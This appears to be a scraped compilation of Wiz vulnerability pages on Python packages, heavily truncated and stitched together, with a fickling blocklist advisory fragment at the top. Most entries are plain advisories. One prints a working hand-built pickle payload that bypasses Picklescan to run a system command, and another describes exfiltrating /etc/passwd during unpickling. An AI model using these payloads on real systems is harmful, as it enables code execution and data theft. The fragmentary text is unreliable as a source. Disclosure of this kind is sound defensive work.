## Our assessment
imtplib
imaplib
ftplib
poplib
telnetlib
nntplib
UnusedVariables
## Original report
## Summary
check_safety()
--check-safety
LIKELY_SAFE
smtplib.SMTP
imaplib.IMAP4
ftplib.FTP
poplib.POP3
telnetlib.Telnet
nntplib.NNTP
## Root Cause 1: Incomplete blocklist (fixed in PR #233)
fickling/fickle.py
UNSAFE_IMPORTS
fickling/analysis.py
UnsafeImportsML.UNSAFE_MODULES
smtplib
SMTP
25
TCP connect, reads SMTP banner, sends EHLO
imaplib
IMAP4
143
TCP connect, reads IMAP capability banner
ftplib
FTP
21
TCP connect, reads FTP welcome banner
poplib
POP3
110
TCP connect, reads POP3 greeting
telnetlib
Telnet
23
TCP connect
nntplib
NNTP
119
TCP connect, NNTP handshake
Wiz
CVE-2026-35523 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-35523 [HIGH] CVE-2026-35523 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35523 :
Python vulnerability analysis and mitigation
0.312.3
connection_init
on_ws_connect
connection_init
on_ws_connect
subscription_protocols=[GRAPHQL_TRANSPORT_WS_PROTOCOL]
Source : NVD
## 7.5
Score
Published April 6, 2026
Severity HIGH
CNA Score N/A
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
strawberry-graphql
Sources
NVD
pip Severity HIGH Has Fix Added at: Apr 06, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Wiz
GHSA-qvc2-mg72-jjhx Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-qvc2-mg72-jjhx Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-qvc2-mg72-jjhx :
Python vulnerability analysis and mitigation
## Summary
sanitize_dom()
style
script
## Details
script
style
_LITERAL_TEXT_SERIALIZATION_ELEMENTS = frozenset({"script", "style"})
def _serialize_text_for_parent(text: str | None, parent_name: str | None) -> str:
if not text:
return ""
if parent_name in _LITERAL_TEXT_SERIALIZATION_ELEMENTS:
return text
return _escape_text(text)
Source : NVD
## 5.3
Score
Published March 18, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
justhtml
Sources
NVD
pip Severity MEDIUM Has
Wiz
CVE-2026-27948 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-27948 [MEDIUM] CVE-2026-27948 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27948 :
Python vulnerability analysis and mitigation
?setck=...
Source : NVD
## 6.1
Score
Published February 26, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
Python
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
copyparty
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Mar 02, 2026
Homebrew Severity MEDIUM Has Fix Added at: Mar 03, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CI
Wiz
CVE-2026-25604 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-25604 [MEDIUM] CVE-2026-25604 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25604 :
Python vulnerability analysis and mitigation
In AWS Auth manager, the origin of the SAML authentication has been used as provided by the client and not verified against the actual instance URL.
This allowed to gain access to different instances with potentially different access controls by reusing SAML response from other instances.
You should upgrade to 9.22.0 version of provider if you use AWS Auth Manager.
Source : NVD
## 5.4
Score
Published March 9, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
airflow-2
airflow-3
Wiz
CVE-2026-25650 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.6
CVE-2026-25650 [MEDIUM] CVE-2026-25650 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25650 :
Python vulnerability analysis and mitigation
MCP Salesforce Connector is a Model Context Protocol (MCP) server implementation for Salesforce integration. Prior to 0.1.10, arbitrary attribute access leads to disclosure of Salesforce auth token. This vulnerability is fixed in 0.1.10.
Source : NVD
## 6.6
Score
Published February 6, 2026
Severity MEDIUM
CNA Score 6.6
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mcp-salesforce-connector
Sources
NVD
pip Severity HIGH Has Fix Added at: Feb 08, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in
Wiz
CVE-2025-69534 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2025-69534 [HIGH] CVE-2025-69534 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-69534 :
Python vulnerability analysis and mitigation
Python-Markdown version 3.8 contain a vulnerability where malformed HTML-like sequences can cause html.parser.HTMLParser to raise an unhandled AssertionError during Markdown parsing. Because Python-Markdown does not catch this exception, any application that processes attacker-controlled Markdown may crash. This enables remote, unauthenticated Denial of Service in web applications, documentation systems, CI/CD pipelines, and any service that renders untrusted Markdown. The issue was acknowledged by the vendor and fixed in version 3.8.1. This issue causes a remote Denial of Service in any application parsing untrusted Markdown, and can lead to Information Disclosure through uncaught exceptions.
Source : NVD
## 7.5
Score
Wiz
CVE-2025-68158 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.7
CVE-2025-68158 [MEDIUM] CVE-2025-68158 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68158 :
Python vulnerability analysis and mitigation
Authlib is a Python library which builds OAuth and OpenID Connect servers. In versions 1.0.0 through 1.6.5, cache-backed state/request-token storage is not tied to the initiating user session, so CSRF is possible for any attacker that has a valid state (easily obtainable via an attacker-initiated authentication flow). When a cache is supplied to the OAuth client registry, FrameworkIntegration.set_state_data writes the entire state blob under state {app}_{state}, and get_state_data ignores the caller’s session altogether. This issue has been patched in version 1.6.6.
Source : NVD
## 8.8
Score
Published January 8, 2026
Severity HIGH
CNA Score 5.7
Affected Technologies
Python
MinimOS
Has Public Exploit Yes
Has CIS
Wiz
CVE-2025-14542 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2025-14542 [HIGH] CVE-2025-14542 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-14542 :
Python vulnerability analysis and mitigation
The vulnerability arises when a client fetches a tools’ JSON specification, known as a Manual, from a remote Manual Endpoint. While a provider may initially serve a benign manual (e.g., one defining an HTTP tool call), earning the clients’ trust, a malicious provider can later change the manual to exploit the client.
Source : NVD
## 7.5
Score
Published December 13, 2025
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 16.7
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
utcp
Sources
NVD
pip Severity HIGH Has Fix Added at: Dec 16, 2025
## G
Wiz
CVE-2026-22250 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.5
CVE-2026-22250 [LOW] CVE-2026-22250 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22250 :
Python vulnerability analysis and mitigation
wlc is a Weblate command-line client using Weblate's REST API. Prior to 1.17.0, the SSL verification would be skipped for some crafted URLs. This vulnerability is fixed in 1.17.0.
Source : NVD
## 5.5
Score
Published January 12, 2026
Severity MEDIUM
CNA Score 2.5
Affected Technologies
Python
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wlc
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM No Fix Added at: Jan 13, 2026
Echo Severity MEDIUM No Fix Added at: Jan 13, 2026
pip Severity LOW Has Fix Added at: Jan 13, 2026
Ubuntu 18.0
Wiz
GHSA-x843-g5mx-g377 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-x843-g5mx-g377 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-x843-g5mx-g377 :
Python vulnerability analysis and mitigation
## Summary
operator.methodcaller
## Details
The attack payload executes in the following steps:
operator.methodcaller
reduce
Then, when the victim checks whether the pickle file is safe using the Picklescan library and this library doesn't detect any dangerous functions, they decide to use pickle.load() on this malicious pickle file, thus leading to remote code execution.
## PoC
import pickle
import pickletools
opcode1 = b'''cbuiltins
__import__
(Vos
tRp0
0coperator
methodcaller
(Vsystem
Vecho "pwned by operator.methodcaller"
tR(g0
tR.'''
pickletools.dis(opcode1)
pickle.loads(opcode1)
This PoC can't be easily created by pickle.dumps, therefore it was manually built.
## Impact
Any organization or indiv
Wiz
CVE-2026-27953 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-27953 [HIGH] CVE-2026-27953 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27953 :
Python vulnerability analysis and mitigation
ormar is a async mini ORM for Python. Versions 0.23.0 and below are vulnerable to Pydantic validation bypass through the model constructor, allowing any unauthenticated user to skip all field validation by injecting " pk_only ": true into a JSON request body. By injecting " pk_only ": true into a JSON request body, an unauthenticated attacker can skip all field validation and persist unvalidated data directly to the database. A secondary excluded parameter injection uses the same pattern to selectively nullify arbitrary model fields (e.g., email or role) during construction. This affects ormar's canonical FastAPI integration pattern recommended in its official documentation, enabling privilege escalation, data integrity vio
Wiz
CVE-2026-25632 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 10.0
CVE-2026-25632 [CRITICAL] CVE-2026-25632 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25632 :
Python vulnerability analysis and mitigation
EPyT-Flow is a Python package designed for the easy generation of hydraulic and water quality scenario data of water distribution networks. Prior to 0.16.1, EPyT-Flow’s REST API parses attacker-controlled JSON request bodies using a custom deserializer (my_load_from_json) that supports a type field. When type is present, the deserializer dynamically imports an attacker-specified module/class and instantiates it with attacker-supplied arguments. This allows invoking dangerous classes such as subprocess.Popen, which can lead to OS command execution during JSON parsing. This also affects the loading of JSON files. This vulnerability is fixed in 0.16.1.
Source : NVD
## 10
Score
Published February 6, 2026
Severity CRITICA
Wiz
CVE-2026-32875 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-32875 [HIGH] CVE-2026-32875 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32875 :
Python vulnerability analysis and mitigation
UltraJSON is a fast JSON encoder and decoder written in pure C with bindings for Python 3.7+. Versions 5.10 through 5.11.0 are vulnerable to buffer overflow or infinite loop through large indent handling. ujson.dumps() crashes the Python interpreter (segmentation fault) when the product of the indent parameter and the nested depth of the input exceeds INT32_MAX. It can also get stuck in an infinite loop if the indent is a large negative number. Both are caused by an integer overflow/underflow whilst calculating how much memory to reserve for indentation. And both can be used to achieve denial of service. To be vulnerable, a service must call ujson.dump()/ujson.dumps()/ujson.encode() whilst giving untrusted users control ove
Wiz
CVE-2026-25138 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-25138 [MEDIUM] CVE-2026-25138 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25138 :
Python vulnerability analysis and mitigation
Rucio is a software framework that provides functionality to organize, manage, and access large volumes of scientific data using customizable policies. Prior to versions 35.8.3, 38.5.4, and 39.3.1, the WebUI login endpoint returns distinct error messages depending on whether a supplied username exists, allowing unauthenticated attackers to enumerate valid usernames. Versions 35.8.3, 38.5.4, and 39.3.1 fix the issue.
Source : NVD
## 5.3
Score
Published February 25, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17
Exploitation Probability (EPSS) 0.1
Affect
Wiz
CVE-2026-27888 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.6
CVE-2026-27888 [MEDIUM] CVE-2026-27888 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27888 :
Python vulnerability analysis and mitigation
xfa
/FlateDecode
Source : NVD
## 6.6
Score
Published February 26, 2026
Severity MEDIUM
CNA Score 6.6
Affected Technologies
Python
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 16.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
pypdf
pypdf2
Sources
NVD
Debian 11 Severity HIGH No Fix Added at: Mar 02, 2026
Debian 12, 13 Severity MEDIUM No Fix Added at: Mar 02, 2026
Debian 14 Severity HIGH Has Fix Added at: Mar 02, 2026
Echo Severity HIGH No Fix Added at: Mar 02, 2026
pip Severity MEDIUM Has Fix Added at: Mar 02, 2026
## Get a CVE risk assessment
Get a prioritized view of
Wiz
CVE-2026-32274 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-32274 [HIGH] CVE-2026-32274 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32274 :
Python vulnerability analysis and mitigation
Black is the uncompromising Python code formatter. Prior to 26.3.1, Black writes a cache file, the name of which is computed from various formatting options. The value of the --python-cell-magics option was placed in the filename without sanitization, which allowed an attacker who controls the value of this argument to write cache files to arbitrary file system locations. Fixed in Black 26.3.1.
Source : NVD
## 8.7
Score
Published March 12, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
Python
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.1
Exploitation Probability (EPSS) N/A
Affected packages and libr
Wiz
CVE-2026-24489 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-24489 [MEDIUM] CVE-2026-24489 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24489 :
Python vulnerability analysis and mitigation
\r\n
\n
\x00
_sanitize_header()
\r
\n
\x00
Source : NVD
## 5.3
Score
Published January 27, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
gakido
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Jan 27, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Publishe
Wiz
CVE-2026-27905 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-27905 [HIGH] CVE-2026-27905 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27905 :
Python vulnerability analysis and mitigation
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Prior to 1.4.36, the safe_extract_tarfile() function validates that each tar member's path is within the destination directory, but for symlink members it only validates the symlink's own path, not the symlink's target. An attacker can create a malicious bento/model tar file containing a symlink pointing outside the extraction directory, followed by a regular file that writes through the symlink, achieving arbitrary file write on the host filesystem. This vulnerability is fixed in 1.4.36.
Source : NVD
## 8.6
Score
Published March 3, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
Python
Has Public Exp
Wiz
CVE-2026-21871 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-21871 [MEDIUM] CVE-2026-21871 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21871 :
Python vulnerability analysis and mitigation
NiceGUI is a Python-based UI framework. From versions 2.13.0 to 3.4.1, there is a XSS risk in NiceGUI when developers pass attacker-controlled strings into ui.navigate.history.push() or ui.navigate.history.replace(). These helpers are documented as History API wrappers for updating the browser URL without page reload. However, if the URL argument is embedded into generated JavaScript without proper escaping, a crafted payload can break out of the intended string context and execute arbitrary JavaScript in the victim’s browser. Applications that do not pass untrusted input into ui.navigate.history.push/replace are not affected. This issue has been patched in version 3.5.0.
Source : NVD
## 6.1
Score
Published January 8,
Wiz
GHSA-9726-w42j-3qjr Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-9726-w42j-3qjr Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-9726-w42j-3qjr :
Python vulnerability analysis and mitigation
## Summary
Unsafe pickle deserialization allows unauthenticated attackers to read arbitrary server files and perform SSRF. By chaining io.FileIO and urllib.request.urlopen, an attacker can bypass RCE-focused blocklists to exfiltrate sensitive data (example: /etc/passwd) to an external server.
## Details
The application deserializes untrusted pickle data. While RCE keywords (os, exec) may be blocked, the exploit abuses standard library features:
io.FileIO: Opens local files without using builtins.open.
urllib.request.urlopen: Accepts the file object as an iterable body for a POST request.
Data Exfiltration: The file content is streamed directly to an attacker-controlled URL during unpickling.
## PoC
import
Wiz
Il database CVE: Intelligence sulle vulnerabilità curata da Wiz | Wiz
blogs_wiz·CVSS 9.8
[CRITICAL] Il database CVE: Intelligence sulle vulnerabilità curata da Wiz | Wiz
## Database delle vulnerabilità Wiz
Una risorsa completa per il monitoraggio delle vulnerabilità di alto profilo negli ambienti cloud, su misura per i team di sicurezza e i professionisti del cloud
Scopri come Wiz rileva vulnerabilità sfruttabili tra carichi di lavoro cloud. Guarda la demo di 12 minuti
## Esplora per tecnologia
## Filtri popolari
## Alto profilo
CVE ID
Severità
Punteggio
Tecnologie
Nome del componente
Exploit CISA KEV
Ha la correzione
Data di pubblicazione
CVE-2026-35616
CRITICAL
9.8
FortiClient EMS
cpe:2.3:a:fortinet:forticlient_enterprise_management_server
Sì
Sì
Apr 04, 2026
GHSA-69fq-xp46-6x23
CRITICAL
9.4
N/A
github.com/aquasecurity/trivy
No
Sì
Mar 24, 2026
CVE-2026-3055
CRITICAL
9.3
Citrix ADC VPX
cpe:2.3:a:citrix:netscaler_appli
Wiz
CVE-2026-33139 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.3
CVE-2026-33139 [HIGH] CVE-2026-33139 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33139 :
Python vulnerability analysis and mitigation
PySpector is a static analysis security testing (SAST) Framework engineered for modern Python development workflows. PySpector versions 0.1.6 and prior are affected by a security validation bypass in the plugin system. The validate_plugin_code() function in plugin_system.py, performs static AST analysis to block dangerous API calls before a plugin is trusted and executed. However, the internal resolve_name() helper only handles ast.Name and ast.Attribute node types, returning None for all others. When a plugin uses indirect function calls via getattr() (such as getattr(os, 'system')) the outer call's func node is of type ast.Call, causing resolve_name() to return None, and the security check to be silently skipped. The plug
Wiz
CVE-2026-26220 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.3
CVE-2026-26220 [CRITICAL] CVE-2026-26220 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26220 :
Python vulnerability analysis and mitigation
LightLLM version 1.1.0 and prior contain an unauthenticated remote code execution vulnerability in PD (prefill-decode) disaggregation mode. The PD master node exposes WebSocket endpoints that receive binary frames and pass the data directly to pickle.loads() without authentication or validation. A remote attacker who can reach the PD master can send a crafted payload to achieve arbitrary code execution.
Source : NVD
## 9.3
Score
Published February 17, 2026
Severity CRITICAL
CNA Score 9.3
High-profile Vulnerability Yes
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 74.4
Exploitation Probabi
Wiz
CVE-2026-26198 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-26198 [CRITICAL] CVE-2026-26198 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26198 :
Python vulnerability analysis and mitigation
sqlalchemy.text()
min()
max()
QuerySet
sum()
avg()
is_numeric
min()
max()
Source : NVD
## 7.5
Score
Published February 24, 2026
Severity HIGH
CNA Score 9.8
Affected Technologies
Python
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
ormar
Sources
NVD
Debian 12 Severity MEDIUM No Fix Added at: Feb 24, 2026
Debian 14 Severity HIGH Has Fix Added at: Feb 24, 2026
Echo Severity HIGH No Fix Added at: Feb 24, 2026
pip Severity CRITICAL Has Fix Added at: Feb 24, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs
Wiz
CVE-2025-70887 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2025-70887 [HIGH] CVE-2025-70887 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-70887 :
Python vulnerability analysis and mitigation
An issue in ralphje Signify before v.0.9.2 allows a remote attacker to escalate privileges via the signed_data.py and the context.py components
Source : NVD
## 8.8
Score
Published March 25, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Python
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 33.4
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
signify
Sources
NVD
pip Severity HIGH Has Fix Added at: Mar 29, 2026
Nix Severity HIGH Has Fix Added at: Apr 05, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not ju
Wiz
CVE-2026-34073 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 1.7
CVE-2026-34073 [LOW] CVE-2026-34073 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34073 :
Python vulnerability analysis and mitigation
cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. Prior to version 46.0.6, DNS name constraints were only validated against SANs within child certificates, and not the "peer name" presented during each validation. Consequently, cryptography would allow a peer named bar.example.com to validate against a wildcard leaf certificate for *.example.com, even if the leaf's parent certificate (or upwards) contained an excluded subtree constraint for bar.example.com. This issue has been patched in version 46.0.6.
Source : NVD
## 1.7
Score
Published March 31, 2026
Severity LOW
CNA Score 1.7
Affected Technologies
Python
Mitmproxy
Has Public Exploit No
Has CISA KEV Explo
Wiz
GHSA-78cv-mqj4-43f7 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-78cv-mqj4-43f7 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-78cv-mqj4-43f7 :
Python vulnerability analysis and mitigation
domain
path
samesite
RequestHandler.set_cookie
Source : NVD
## 5.4
Score
Published March 11, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
tornado
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Mar 12, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Publ
Wiz
CVE-2025-66645 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2025-66645 [HIGH] CVE-2025-66645 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-66645 :
Python vulnerability analysis and mitigation
NiceGUI is a Python-based UI framework. Versions 3.3.1 and below are vulnerable to directory traversal through the App.add_media_files() function, which allows a remote attacker to read arbitrary files on the server filesystem. This issue is fixed in version 3.4.0.
Source : NVD
## 7.5
Score
Published December 9, 2025
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 77.6
Exploitation Probability (EPSS) 1.1
Affected packages and libraries
nicegui
Sources
NVD
pip Severity HIGH Has Fix Added at: Dec 09, 2025
## Get a CVE risk assessment
Get a prioritized view
Wiz
CVE-2026-27024 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-27024 [MEDIUM] CVE-2026-27024 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27024 :
Python vulnerability analysis and mitigation
pypdf is a free and open-source pure-python PDF library. Prior to 6.7.1, an attacker who uses this vulnerability can craft a PDF which leads to an infinite loop. This requires accessing the children of a TreeObject, for example as part of outlines. This vulnerability is fixed in 6.7.1.
Source : NVD
## 6.9
Score
Published February 20, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
pypdf
pypdf2
Sources
NVD
Chainguard Has Fix Added at: Feb 21, 2026
Debian 11, 12, 13 Severity
Wiz
CVE-2026-27809 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.8
CVE-2026-27809 [MEDIUM] CVE-2026-27809 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27809 :
Python vulnerability analysis and mitigation
psd-tools is a Python package for working with Adobe Photoshop PSD files. Prior to version 1.12.2, when a PSD file contains malformed RLE-compressed image data (e.g. a literal run that extends past the expected row size), decode_rle() raises ValueError which propagated all the way to the user, crashing psd.composite() and psd-tools export. decompress() already had a fallback that replaces failed channels with black pixels when result is None, but it never triggered because the ValueError from decode_rle() was not caught. The fix in version 1.12.2 wraps the decode_rle() call in a try/except so the existing fallback handles the error gracefully.
Source : NVD
## 6.8
Score
Published February 26, 2026
Severity MEDIUM
CNA
Wiz
CVE-2026-1778 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.2
CVE-2026-1778 [HIGH] CVE-2026-1778 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1778 :
Python vulnerability analysis and mitigation
Amazon SageMaker Python SDK before v3.1.1 or v2.256.0 disables TLS certificate verification for HTTPS connections made by the service when a Triton Python model is imported, incorrectly allowing for requests with invalid and self-signed certificates to succeed.
Source : NVD
## 8.2
Score
Published February 2, 2026
Severity HIGH
CNA Score 8.2
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
sagemaker
Sources
NVD
pip Severity HIGH Has Fix Added at: Feb 03, 2026
## Get a CVE risk assessment
Get a prioritized view of CV
Wiz
CVE-2026-25736 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-25736 [MEDIUM] CVE-2026-25736 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25736 :
Python vulnerability analysis and mitigation
Rucio is a software framework that provides functionality to organize, manage, and access large volumes of scientific data using customizable policies. Versions prior to 35.8.3, 38.5.4, and 39.3.1 have a stored Cross-Site Scripting (XSS) vulnerability in the Custom RSE Attribute of the WebUI where attacker-controlled input is persisted by the backend and later rendered in the WebUI without proper output encoding. This allows arbitrary JavaScript execution in the context of the WebUI for users who view affected pages, potentially enabling session token theft or unauthorized actions. Versions 35.8.3, 38.5.4, and 39.3.1 fix the issue.
Source : NVD
## 4.8
Score
Published February 25, 2026
Severity MEDIUM
CNA Score 6.1
Wiz
CVE-2026-21851 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-21851 [MEDIUM] CVE-2026-21851 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21851 :
Python vulnerability analysis and mitigation
_download_from_ngc_private()
zipfile.ZipFile.extractall()
safe_extract_member()
Source : NVD
## 5.3
Score
Published January 7, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
monai
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Jan 06, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA
Wiz
